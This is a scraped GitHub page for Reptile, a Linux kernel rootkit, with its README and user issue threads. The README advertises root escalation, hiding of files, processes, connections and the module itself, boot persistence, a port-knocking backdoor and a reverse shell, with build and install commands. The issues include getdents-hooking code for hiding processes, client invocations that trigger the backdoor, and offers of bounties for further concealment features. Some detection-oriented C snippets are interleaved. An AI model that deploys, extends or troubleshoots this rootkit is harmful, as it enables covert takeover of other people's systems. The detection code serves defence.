
reptile's Introduction

Reptile











Tested on

Debian 9: 4.9.0-8-amd64
Debian 10: 4.19.0-8-amd64
Ubuntu 18.04.1 LTS: 4.15.0-38-generic
Kali Linux: 4.18.0-kali2-amd64
Centos 6.10: 2.6.32-754.6.3.el6.x86_64
Centos 7: 3.10.0-862.3.2.el7.x86_64
Centos 8: 4.18.0-147.5.1.el8_1.x86_64

Features

  • Give root to unprivileged users
  • Hide files and directories
  • Hide processes
  • Hide itself
  • Hide TCP/UDP connections
  • Hidden boot persistence
  • File content tampering
  • Some obfuscation techniques
  • ICMP/UDP/TCP port-knocking backdoor
  • Full TTY/PTY shell with file transfer
  • Client to handle Reptile Shell
  • Shell connects back at a configurable interval (not enabled by default)

Install

apt install build-essential libncurses-dev linux-headers-$(uname -r)
git clone https://github.com/f0rb1dd3n/Reptile.git
cd Reptile
make menuconfig           # or 'make config' or even 'make defconfig'
make
make install

For more details about the installation, see the Wiki.

Uninstall

After a successful installation, the command to remove Reptile is shown on screen.

Usage

See the Wiki for usage details. So, read the fucking manual before opening an issue!

Warning

Some functions of this module are based on other rootkits. Please see the references!

References

Thanks

Special thanks to my friend Ilya V. Matveychikov for the KHOOK framework and kmatryoshka loader.

Disclaimer

If you want more information, send me an e-mail: [email protected]

reptile's People

Contributors

8887-eth, corefx, f0rb1dd3n, kaimi-, maxxor, shanginn, tehw0lf


reptile's Issues

shorten root escalation code

Hey there, the r00t.c code can be shortened without losing functionality - not sure if that's your style, but I opened a pull request in #5

Also I found some typos and fixed them. By the way, really neat tool you wrote there 👍

lsof: WARNING: unsupported format: /proc/net/tcp

[test@test ~]$ lsof -i -n -P
lsof: WARNING: unsupported format: /proc/net/tcp
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
systemd-n 448 systemd-network 19u IPv4 15693 0t0 UDP 192.168.1.112:68
systemd-r 460 systemd-resolve 12u IPv4 16107 0t0 UDP 127.0.0.53:53
sshd 540 root 4u IPv6 17935 0t0 TCP *:22 (LISTEN)

Tested on Ubuntu 18.04.1 and Debian 9.
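The warning above is lsof saying that what it read from /proc/net/tcp no longer has the layout it expects, which on a host where a module filters that table on the read path is itself a tell. A more direct check, added here as an example and not part of this issue or of Reptile, is to cross-reference the socket inodes listed in /proc/net/tcp against the socket:[N] targets of every /proc/<pid>/fd/ link: an inode some process holds open that no table lists has been hidden from the table reader. Both inputs below are constructed samples with made-up inode numbers, not data captured from a host; on a live system you would concatenate /proc/net/tcp, tcp6, udp, udp6 and raw (which share this column layout; /proc/net/unix does not) and readlink every fd of every PID.

```c
#include <stdio.h>
#include <string.h>

#define MAX_INODES 256

/* Constructed sample of /proc/net/tcp (made-up inode numbers, not a capture).
 * Only inodes 17935 and 16107 are listed. */
static const char *SAMPLE_PROC_NET_TCP =
    "  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode\n"
    "   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 17935 1 0000000000000000 100 0 0 10 0\n"
    "   1: 3500007F:0035 00000000:0000 0A 00000000:00000000 00:00000000 00000000   101        0 16107 1 0000000000000000 100 0 0 10 0\n";

/* Constructed readlink() targets of /proc/<pid>/fd/<n> entries across all visible
 * processes. Socket inode 18222 is open somewhere but absent from the table above. */
static const char *SAMPLE_FD_LINKS[] = {
    "socket:[17935]", "socket:[16107]", "socket:[18222]", "/dev/null", "pipe:[2100]"
};
#define SAMPLE_FD_COUNT (sizeof SAMPLE_FD_LINKS / sizeof SAMPLE_FD_LINKS[0])

/* Collect the inode column of every data row in a /proc/net/{tcp,tcp6,udp,udp6,raw}
 * table (several tables may be concatenated; they share this column order).
 * Header rows do not match the pattern and are skipped. Returns inodes stored. */
size_t parse_net_table_inodes(const char *text, unsigned long *out, size_t max)
{
    size_t n = 0;
    const char *p = text;

    while (*p && n < max) {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        char line[512];
        unsigned long inode;

        if (len >= sizeof line)
            len = sizeof line - 1;
        memcpy(line, p, len);
        line[len] = '\0';
        /* sl: local rem st tx:rx tr:when retrnsmt uid timeout inode ... */
        if (sscanf(line, " %*d: %*s %*s %*x %*s %*s %*x %*d %*d %lu", &inode) == 1)
            out[n++] = inode;
        p = nl ? nl + 1 : p + len;
    }
    return n;
}

/* Parse a "socket:[N]" link target; returns 1 and stores N on a match. */
int parse_socket_link(const char *link, unsigned long *inode)
{
    unsigned long v;
    char tail = 0;

    if (sscanf(link, "socket:[%lu%c", &v, &tail) == 2 && tail == ']') {
        *inode = v;
        return 1;
    }
    return 0;
}

static int contains(const unsigned long *arr, size_t n, unsigned long v)
{
    for (size_t i = 0; i < n; i++)
        if (arr[i] == v)
            return 1;
    return 0;
}

/* Socket inodes some process holds open that none of the kernel's socket tables
 * lists: the signature of a read-path filter on /proc/net. Returns how many
 * were stored in `hidden`. */
size_t find_hidden_sockets(const char *net_tables, const char **fd_links, size_t nlinks,
                           unsigned long *hidden, size_t max)
{
    unsigned long known[MAX_INODES];
    size_t nknown = parse_net_table_inodes(net_tables, known, MAX_INODES);
    size_t nh = 0;

    for (size_t i = 0; i < nlinks && nh < max; i++) {
        unsigned long ino;
        if (parse_socket_link(fd_links[i], &ino) && !contains(known, nknown, ino))
            hidden[nh++] = ino;
    }
    return nh;
}

/* Run the check over the constructed sample; returns the first hidden inode, 0 if none. */
unsigned long demo_hidden_inode(void)
{
    unsigned long hidden[MAX_INODES];
    size_t n = find_hidden_sockets(SAMPLE_PROC_NET_TCP, SAMPLE_FD_LINKS, SAMPLE_FD_COUNT,
                                   hidden, MAX_INODES);
    return n ? hidden[0] : 0;
}

int main(void)
{
    printf("first socket inode missing from the /proc/net tables (0 = none): %lu\n",
           demo_hidden_inode());
    return 0;
}
```

The check only covers processes whose /proc/<pid> directory is visible; a module that also hides the owning PID defeats it, which is why this cross-reference is normally paired with a PID sweep that stat()s /proc/1 through /proc/pid_max directly instead of trusting a directory listing.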

install failed

After executing apt-get install linux-headers-$(uname -r), it shows

Reading package lists... Done
Building dependency tree
Reading state information... Done
linux-headers-4.4.0-116-generic is already the newest version (4.4.0-116.140).
0 upgraded, 0 newly installed, 0 to remove and 158 not upgraded.

Then I execute ./installer.sh install, and it shows

############################################################################
############################ REPTILE INSTALLER #############################
############################################################################
writen by: F0rb1dd3n

Compiling... DONE!
Copying binaries to /reptile... DONE!
Installing... insmod: ERROR: could not insert module /reptile/reptile.ko: Invalid module format
ERROR!

Additional information about the system:
Linux version 4.4.0-116-generic (buildd@lgw01-amd64-021) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018

Compile error

Hi,
Thanks for the beta version. I tried to compile it on Ubuntu 18.04.1 (64 bit) but I got the following error:
: In function 'runshell':
:118:2: warning: ignoring return value of 'chdir', declared with attribute warn_unused_result [-Wunused-result]
/tmp/ccsXzAOl.o: In function `runshell': :(.text+0x267): undefined reference to `openpty'
collect2: error: ld returned 1 exit status
Makefile:12: recipe for target 'reverse' failed
make[1]: *** [reverse] Error 1
make[1]: Leaving directory '/home/test/Reptile/sbin'
Makefile:2: recipe for target 'all' failed
make: *** [all] Error 2

error compile centos 7

I use CentOS 7 to compile the rootkit but I have this error:

Configuring... Can't locate String/Unescape.pm in @INC (@INC contains: /usr/local/lib64/perl5 /usr/local/share/perl5 /usr/lib64/perl5/vendor_perl /usr/share/perl5/vendor_perl /usr/lib64/perl5 /usr/share/perl5 .) at scripts/destringify.pl line 8.
BEGIN failed--compilation aborted at scripts/destringify.pl line 8.
Can't locate String/Unescape.pm in @INC (@INC contains: /usr/local/lib64/perl5 /usr/local/share/perl5 /usr/lib64/perl5/vendor_perl /usr/share/perl5/vendor_perl /usr/lib64/perl5 /usr/share/perl5 .) at scripts/destringify.pl line 8.
BEGIN failed--compilation aborted at scripts/destringify.pl line 8.
DONE!
Compiling... ERROR!

How to use the Hiding Files Function?

Thanks for your nice work!
I still can't understand how to use the hiding files function.
In the readme:
Hide/unhide file contents: kill -51 0, and all content between the tags will be hidden
#
content to hide
#

What I did (using all default settings):
[root@TEST ~]# cd Reptile
[root@TEST Reptile]# ls
installer.sh libpcap-1.5.3.tar.gz README.md sbin
libpcap-1.5.3 Makefile rep_mod.c scripts
[root@TEST Reptile]# # /root/Reptile/README.md #
[root@TEST Reptile]# kill -51 0
[root@TEST Reptile]# kill -51 0 # /root/Reptile/README.md #
[root@TEST Reptile]# ls
installer.sh libpcap-1.5.3.tar.gz README.md sbin
libpcap-1.5.3 Makefile rep_mod.c scripts
[root@TEST Reptile]# #
[root@TEST Reptile]# /root/Reptile/README.md
-bash: /root/Reptile/README.md: Permission denied
[root@TEST Reptile]# #
[root@TEST Reptile]# ls
installer.sh libpcap-1.5.3.tar.gz README.md sbin
libpcap-1.5.3 Makefile rep_mod.c scripts
[root@TEST Reptile]#

I just don't know how to hide the file /root/Reptile/README.md.
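The README line quoted in the post says the content between the tags is hidden, so the markers have to be inside the file that is being read; typed at the shell prompt, as in the transcript above, they are only shell comments, and the kill -51 0 toggles a feature that has nothing to act on. The example below is added here and is not taken from the issue or from Reptile: it is a user-space model of that read-path filter, copying a file's bytes while dropping each region from an opening marker through the end of the line that holds the closing marker. The marker strings #<tag> / #</tag> and the crontab-style sample are assumptions made for the example (the page shows the real markers only as "#"); Reptile does the equivalent inside the kernel.

```c
#include <stdio.h>
#include <string.h>

/* Assumed marker form for this example; the page shows the real markers only as "#". */
#define OPEN_TAG  "#<tag>"
#define CLOSE_TAG "#</tag>"

/* Constructed crontab-style file: the line between the markers is what a
 * read-path filter would drop from every read() of the file. */
static const char *SAMPLE_FILE =
    "# m h dom mon dow command\n"
    "0 5 * * * /usr/bin/backup\n"
    "#<tag>\n"
    "* * * * * /opt/.hidden/beacon\n"
    "#</tag>\n"
    "30 6 * * 1 /usr/bin/logrotate\n";

/* Bounded append; truncates rather than overflowing `out` (cap includes the NUL). */
static size_t append(char *out, size_t o, size_t cap, const char *s, size_t n)
{
    if (o + n >= cap)
        n = cap - 1 - o;
    memcpy(out + o, s, n);
    return o + n;
}

/* Copy `in` to `out` minus every region from an opening marker through the end of
 * the line that holds its closing marker (markers included): "all content between
 * the tags will be hidden". An opening marker with no closing marker stays visible.
 * Returns the number of bytes written to `out`. */
size_t strip_tagged(const char *in, char *out, size_t cap,
                    const char *open_tag, const char *close_tag)
{
    size_t o = 0;
    const char *p = in;

    while (*p) {
        const char *start = strstr(p, open_tag);
        const char *end, *nl;
        if (!start)
            break;
        end = strstr(start + strlen(open_tag), close_tag);
        if (!end)
            break;
        o = append(out, o, cap, p, (size_t)(start - p));   /* visible prefix */
        p = end + strlen(close_tag);
        nl = strchr(p, '\n');                              /* swallow the rest of the tag line */
        p = nl ? nl + 1 : p + strlen(p);
    }
    o = append(out, o, cap, p, strlen(p));                 /* visible tail */
    out[o] = '\0';
    return o;
}

/* Run the filter over the constructed sample; returns the visible text (static buffer). */
const char *strip_tagged_demo(void)
{
    static char out[1024];
    strip_tagged(SAMPLE_FILE, out, sizeof out, OPEN_TAG, CLOSE_TAG);
    return out;
}

int main(void)
{
    printf("--- on disk ---\n%s--- as read through the filter ---\n%s",
           SAMPLE_FILE, strip_tagged_demo());
    return 0;
}
```

Because a filter of this shape acts when the file is read, it leaves the on-disk size alone: a file whose stat() size exceeds the bytes a full read returns deserves a second look, as does the presence of the marker strings in a copy of the file taken from the raw block device or from a backup made before the module was loaded.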

NAT

Hi, thank you for this great project! As I read in another topic, it only works on an internal network, but I really need to use it with my VPS. How can I set it up to work through NAT? Does anyone have experience with that? There is no problem with the listener, but the server can't connect to me.

P.S. ./reverse works fine. Probably something with the magic packet; maybe I used it wrong? I run a web server on my VPS; is it possible to send a packet to Apache and trigger the reverse connection?

Doesn't Build on 4.17-1

# make
mkdir -p bin
cd sbin && make all
make[1]: Entering directory '/home/user/Desktop/Projects/Reptile/sbin'
gcc -O -W -Wall -o client  pel.c aes.c sha1.c client.c
client.c: In function ‘p_error’:
client.c:48:4: warning: ‘strncat’ specified bound 7 equals source length [-Wstringop-overflow=]
    strncat(error_message, " Error ", 7);
    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
gcc -O -W -Wall -o shell pel.c aes.c sha1.c shell.c -lutil -DLINUX
gcc -Wall r00t.c -o r00t
strip client shell r00t
cp client shell r00t ../bin
make[1]: Leaving directory '/home/user/Desktop/Projects/Reptile/sbin'
make EXTRA_CFLAGS="-Dx86_64" -C /lib/modules/4.17.0-1-ARCH/build M=/home/user/Desktop/Projects/Reptile modules
make[1]: Entering directory '/usr/lib/modules/4.17.0-1-ARCH/build'
  CC [M]  /home/user/Desktop/Projects/Reptile/rep_mod.o
/home/user/Desktop/Projects/Reptile/rep_mod.c: In function ‘generic_find_sys_call_table’:
/home/user/Desktop/Projects/Reptile/rep_mod.c:397:51: error: ‘sys_close’ undeclared (first use in this function); did you mean ‘ksys_close’?
   if (syscall_table[__NR_close] == (unsigned long)sys_close)
                                                   ^~~~~~~~~
                                                   ksys_close
/home/user/Desktop/Projects/Reptile/rep_mod.c:397:51: note: each undeclared identifier is reported only once for each function it appears in
make[2]: *** [scripts/Makefile.build:319: /home/user/Desktop/Projects/Reptile/rep_mod.o] Error 1
make[1]: *** [Makefile:1572: _module_/home/user/Desktop/Projects/Reptile] Error 2
make[1]: Leaving directory '/usr/lib/modules/4.17.0-1-ARCH/build'
make: *** [Makefile:7: all] Error 2

Also, from my testing, syscall hooking no longer works in 4.17 so finding a way around that will be fun. Tested the same basic directory hiding code that worked on 4.16.13 on 4.17 and it no longer works.

kernel: general protection fault: 0000 [#1] SMP

Hello,
I was testing the new remote backdoor (it's very nice) when I encountered this kernel crash (it happens quite quickly after using the remote backdoor). I was using Ubuntu 16.04.4 server (on VirtualBox) for testing. A similar crash also happened on Ubuntu 18.04 server.
Details: crash.txt

Predefined Hidden process name

Hi,

I'm trying to add a hardcoded predefined hidden process name.

I'm trying this but it doesn't work:

#include <linux/string.h>
static const char* phpn = "process";

in both getdents and getdents64:

while(off < ret) {
	dir = (void *)kdir + off;
	/* hide the entry if: HIDE prefix (normal dir), invisible PID (/proc), or the predefined name */
	if((!p && (memcmp(HIDE, dir->d_name, strlen(HIDE)) == 0))
	    || (p && is_invisible(simple_strtoul(dir->d_name, NULL, 10)))
	    /* Predefined process check */
	    || (p && (strncmp(dir->d_name, phpn, strlen(phpn)) == 0))) {
		if(dir == kdir) {
			/* first record: slide the rest of the buffer down over it */
			ret -= dir->d_reclen;
			memmove(dir, (void *)dir + dir->d_reclen, ret);
			continue;
		}
		/* otherwise let the previous record's length swallow this one */
		prev->d_reclen += dir->d_reclen;
	} else {
		prev = dir;
	}
	off += dir->d_reclen;
}
if(copy_to_user(dirent, kdir, ret))

kfree(kdir);
return ret;
}

I was going to add a signal switch next to enable and disable the hiding of predefined process(es)
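Added here as a user-space model of the loop in the post (it is neither the project's code nor the poster's): it builds a getdents64 buffer from constructed names, runs the same absorb-into-previous-record / memmove-when-first logic over it with the prefix "reptile" standing in for the hidden name, and walks the result the way a getdents64 caller would, so the effect of growing d_reclen can be seen directly. One point about the predefined-name check in the post: when p is set the existing code treats d_name as a PID (simple_strtoul on it), because the directory being listed is /proc, whose entries are PID numbers; a comparison of d_name against a command name can never match there, so a name-based rule would have to be resolved to PIDs some other way. The struct below is the x86-64 linux_dirent64 record layout; the names and inode numbers are made up.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Record layout getdents64(2) returns on x86-64: NUL-terminated d_name, d_reclen padded to 8. */
struct linux_dirent64 {
    unsigned long long d_ino;
    long long d_off;
    unsigned short d_reclen;
    unsigned char d_type;
    char d_name[];
};

/* Append one record to a getdents64-style buffer; returns the new buffer length. */
static size_t add_entry(char *buf, size_t off, unsigned long long ino, const char *name)
{
    size_t namelen = strlen(name) + 1;
    size_t reclen = (offsetof(struct linux_dirent64, d_name) + namelen + 7) & ~(size_t)7;
    struct linux_dirent64 *d = (struct linux_dirent64 *)(buf + off);

    d->d_ino = ino;
    d->d_off = (long long)(off + reclen);
    d->d_reclen = (unsigned short)reclen;
    d->d_type = 0;
    memcpy(d->d_name, name, namelen);
    return off + reclen;
}

/* The hook's loop from the post, on a user-space copy of the buffer: a record whose
 * name starts with `prefix` is absorbed into the previous record's d_reclen, or
 * memmove'd out when it is the first record. Returns the byte count a hooked
 * getdents64 would hand back to the caller. */
long filter_dirents(char *kdir, long ret, const char *prefix)
{
    struct linux_dirent64 *dir, *prev = NULL;
    long off = 0;

    while (off < ret) {
        dir = (struct linux_dirent64 *)(kdir + off);
        if (strncmp(dir->d_name, prefix, strlen(prefix)) == 0) {
            if (dir == (struct linux_dirent64 *)kdir) {
                ret -= dir->d_reclen;
                memmove(dir, (char *)dir + dir->d_reclen, (size_t)ret);
                continue;                      /* slot 0 now holds another record: re-check it */
            }
            prev->d_reclen += dir->d_reclen;   /* callers now step straight over the hidden record */
        } else {
            prev = dir;
        }
        off += dir->d_reclen;
    }
    return ret;
}

/* Walk the buffer the way a getdents64 caller does, following d_reclen. Returns the
 * record count and writes the names, space-separated, into `out` (cap bytes). */
size_t walk_dirents(const char *buf, long len, char *out, size_t cap)
{
    size_t n = 0, o = 0;
    for (long off = 0; off < len; n++) {
        const struct linux_dirent64 *d = (const struct linux_dirent64 *)(buf + off);
        if (o < cap)
            o += (size_t)snprintf(out + o, cap - o, "%s%s", n ? " " : "", d->d_name);
        off += d->d_reclen;
    }
    return n;
}

/* Constructed listing (made-up names and inodes): three names carry the prefix,
 * one of them first so the memmove branch runs. Returns the buffer length. */
static long build_sample(char *buf)
{
    static const char *names[] = { "reptile_first", ".", "..", "notes.txt", "reptile", "bin", "reptile-last" };
    size_t off = 0;
    for (size_t i = 0; i < sizeof names / sizeof *names; i++)
        off = add_entry(buf, off, 100 + i, names[i]);
    return (long)off;
}

/* Filter the sample with the hidden prefix "reptile"; returns the names a caller
 * would still see, space-separated (static buffer). */
const char *demo_listing(void)
{
    static char out[256];
    long long storage[128];                    /* 8-byte aligned backing store for the records */
    char *buf = (char *)storage;
    long len = filter_dirents(buf, build_sample(buf), "reptile");
    walk_dirents(buf, len, out, sizeof out);
    return out;
}

int main(void)
{
    long long storage[128];
    char before[256], *buf = (char *)storage;
    walk_dirents(buf, build_sample(buf), before, sizeof before);
    printf("before: %s\nafter:  %s\n", before, demo_listing());
    return 0;
}
```

A side effect visible in the returned buffer: the surviving record just before each hidden one carries a d_reclen far larger than its own name needs, and a detector that walks the raw getdents64 output and compares each d_reclen with the padded length of its d_name can flag those gaps.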

New features

I would love to see these features implemented soon:

Hide CPU usage for specified processes : bounty 0.2btc
Hide iptables rules via netfilter hooks - bounty 0.1btc
Execute command at specified time directly via module (not using third party apps like cron) - bounty 0.1btc

Let me know if you are willing to work on this and I will forward my onion contact info.

Hello,

So, to install on this CentOS you just need to run ./setup.sh install. But before that you will have to install the String::Unescape Perl module.

To do that, normally it is just this command, or even cpan -i String::Unescape. But if you are having problems with that, you will have to check your Perl. In some configurations, Perl may not be fully installed.

Try to install (or even reinstall) Perl and cpan on your system: yum install perl-devel cpan

yum update is also recommended.

Originally posted by @f0rb1dd3n in #54 (comment)

setup.sh: offensive sentence [remove proposal].

You have a nice project, and judging by the stars it has, you should be very proud.
However, I propose the complete removal of this line from the setup.sh.

It's very much offensive and without adding any value to your project. Don't you agree?

(you're being silly there, buddy, for no reason).

Can't remove

Hi, I'm a gay ... :)
So, when I launch ./installer.sh remove I get this:
Uninstalling... rmmod: ERROR: Module rep_mod is in use

Another Info:
On 4.15.0-kali3-amd64
lsmod | grep rep_mod
rep_mod 20480 1

/sbin/modinfo reptile
filename: /lib/modules/4.15.0-kali3-amd64/kernel/drivers/PulseAudio/reptile/reptile.ko
description: Reptile - A linux LKM rootkit
author: F0rb1dd3n - [email protected]
license: GPL
depends:
retpoline: Y
name: rep_mod
vermagic: 4.15.0-kali3-amd64 SMP mod_unload modversions

rmmod /lib/modules/4.15.0-kali3-amd64/kernel/drivers/PulseAudio/reptile/reptile.ko
rmmod: ERROR: Module reptile is not currently loaded

How to uninstall please ?

TCP and UDP knock not working

The TCP and UDP knocking in heaven's door is not working on a CentOS 6 box. Only ICMP knocking works. Could you check what the issue might be? Sebd rootkit raw sockets work on CentOS 6.

headers problem

Hi, any idea how to fix this problem?

root@test2:/opt/Reptile # ./setup.sh install

############################################################################
############################ REPTILE INSTALLER #############################
############################################################################
written by: F0rb1dd3n

SELinux config found on system!
Checking SELinux status... clear

Hide name (will be used to hide dirs/files) (default: reptile):
Auth token to magic packets (default: hax0r):
Backdoor password (default: s3cr3t):
Tag name that hide file contents (default: reptile):
Source port of magic packets (default: 666):
Would you like to config reverse shell each X time? (y/n) (default: n):

Token: hax0r
Backdoor password: s3cr3t
SRC port: 666

TAGs to hide file contents:

#
content to be hidden
#

Configuring... DONE!
Compiling... mkdir -p bin
cd sbin && make reverse cmd
make[1]: Entering directory '/opt/Reptile/sbin'
make[1]: 'reverse' is up to date.
make[1]: 'cmd' is up to date.
make[1]: Leaving directory '/opt/Reptile/sbin'
make -C /lib/modules/4.11.5-200.fc25.x86_64/build M=$PWD
make[1]: *** /lib/modules/4.11.5-200.fc25.x86_64/build: No such file or directory. Stop.
Makefile:2: recipe for target 'all' failed
make: *** [all] Error 2
ERROR!

root@test2:/opt/Reptile # yum install kernel-devel
Redirecting to '/usr/bin/dnf install kernel-devel' (see 'man yum2dnf')

Last metadata expiration check: 2:48:28 ago on Thu Dec 6 15:20:15 2018.
Package kernel-devel-4.13.16-100.fc25.x86_64 is already installed, skipping.
Dependencies resolved.
Nothing to do.
Complete!
root@test2:/opt/Reptile # ls -al /lib/modules/4.11.5-200.fc25.x86_64/
total 14380
drwxr-xr-x. 5 root root 4096 Jun 20 2017 .
drwxr-xr-x. 5 root root 4096 Dec 6 18:04 ..
lrwxrwxrwx. 1 root root 39 Jun 14 2017 build -> /usr/src/kernels/4.11.5-200.fc25.x86_64
-rw-r--r--. 1 root root 185270 Jun 14 2017 config
drwxr-xr-x. 13 root root 4096 Jun 20 2017 kernel
-rw-r--r--. 1 root root 974994 Jun 20 2017 modules.alias
-rw-r--r--. 1 root root 955399 Jun 20 2017 modules.alias.bin
-rw-r--r--. 1 root root 1804 Jun 14 2017 modules.block
-rw-r--r--. 1 root root 7554 Jun 14 2017 modules.builtin
-rw-r--r--. 1 root root 9974 Jun 20 2017 modules.builtin.bin
-rw-r--r--. 1 root root 334323 Jun 20 2017 modules.dep
-rw-r--r--. 1 root root 472573 Jun 20 2017 modules.dep.bin
-rw-r--r--. 1 root root 331 Jun 20 2017 modules.devname
-rw-r--r--. 1 root root 153 Jun 14 2017 modules.drm
-rw-r--r--. 1 root root 110 Jun 14 2017 modules.modesetting
-rw-r--r--. 1 root root 2701 Jun 14 2017 modules.networking
-rw-r--r--. 1 root root 126788 Jun 14 2017 modules.order
-rw-r--r--. 1 root root 486 Jun 20 2017 modules.softdep
-rw-r--r--. 1 root root 403343 Jun 20 2017 modules.symbols
-rw-r--r--. 1 root root 493901 Jun 20 2017 modules.symbols.bin
lrwxrwxrwx. 1 root root 5 Jun 14 2017 source -> build
-rw-------. 1 root root 3550927 Jun 14 2017 System.map
drwxr-xr-x. 2 root root 4096 Jun 14 2017 updates
drwxr-xr-x. 2 root root 4096 Jun 20 2017 vdso
-rwxr-xr-x. 1 root root 7137256 Jun 14 2017 vmlinuz
-rw-r--r--. 1 root root 167 Jun 14 2017 .vmlinuz.hmac
root@test2:/opt/Reptile # uname -a
Linux test2 4.11.5-200.fc25.x86_64 #1 SMP Wed Jun 14 17:17:29 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
root@test2:/opt/Reptile # cat /proc/version
Linux version 4.11.5-200.fc25.x86_64 ([email protected]) (gcc version 6.3.1 20161221 (Red Hat 6.3.1-1) (GCC) ) #1 SMP Wed Jun 14 17:17:29 UTC 2017
root@test2:/opt/Reptile # cat /etc/fedora-release
Fedora release 25 (Twenty Five)

hello

This is a great design and I want to learn it. Can you tell me how to use it on CentOS 7? Thank you! My kernel is CentOS 7 3.10.0-693.el7.x86_64. What should I do?

How to set PORT ?

reptile-client> set PORT TCP=1
[-] wrong parameter!
How to set PORT ?

Memory leak

void shell_execer(struct work_struct *work) {
	struct shell_task *task = (struct shell_task *)work;
	char *argv[] = { task->path, "-t", task->ip, "-p", task->port, NULL };

	exec(argv);
	if(task) {
		bzero(task->path, strlen(task->path));	/* <<-- task->path leak */
		bzero(task->ip, strlen(task->ip));	/* <<-- task->{ip,port} leak */
		bzero(task->port, strlen(task->port));
		kfree(task);
	}
}

Hide other modules

I have an application which processes I can hide with reptile. But it also loads a module which can be found with lsmod and likely other commands. Is there some way to hide the module with reptile?

I tested on CentOS 6.5, compiling error

uname -a
Linux root 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
Compiling Error
############################################################################
############################ REPTILE INSTALLER #############################
############################################################################
written by: F0rb1dd3n
SELinux config found on system!
Checking SELinux status... clear

Hide name (will be used to hide dirs/files) (default: reptile):
Auth token to port-knocking (default: hax0r):
Backdoor password (default: s3cr3t):
Tag name that hide file contents (default: reptile):
Source port to port-knocking (default: 666):
TCP port to port-knocking (default: 80):
UPD port to port-knocking (default: 53):

Hide name: reptile
Token: hax0r
Backdoor password: s3cr3t
SRC port: 666
TCP port: 80
UDP port: 53
TAGs to hide file contents:

#
content to be hidden
#

Configuring... DONE!
Compiling... ERROR!

Kernel Crash after unloading module

I get a crash after unloading the module; it looks like memory corruption:
"BUG: unable to handle kernel paging request at ffffffffc06e69bb"
It has something to do with the file content hiding feature; it doesn't crash after commenting out all related functions.
This is on CentOS 7 3.10.0-693.5.2.el7.x86_64.

Some bug may cause the crash.

Tested on CentOS 6 x64 (using all the default settings):

  1. Set the port-knocking auth token as "hax0r" and use the client as:
     ./reptile_client -l 127.0.0.1 -t 127.0.0.1 -p 5555 -x icmp -k hax0r -w s3cr3t
     then you will get a shell, but with
     ./reptile_client -l 127.0.0.1 -t 127.0.0.1 -p 5555 -x icmp -k hax0r123 -w s3cr3t
     you can still get a shell. If you try
     ./reptile_client -l 127.0.0.1 -t 127.0.0.1 -p 5555 -x icmp -k hax0rasuhuicsashai155 -w s3cr3t
     (the right auth token plus some random chars), the system will crash.
  2. If you set the auth token a bit longer than "hax0r", such as "hax0rchsausau", then the port-knocking will not work.
  3. If you set the hide name a bit longer than "reptile", the port-knocking will not work.

Reptile may have a chance to crash a RHEL6 box using all the default settings; sorry, I forgot to log the error code.
Good luck!
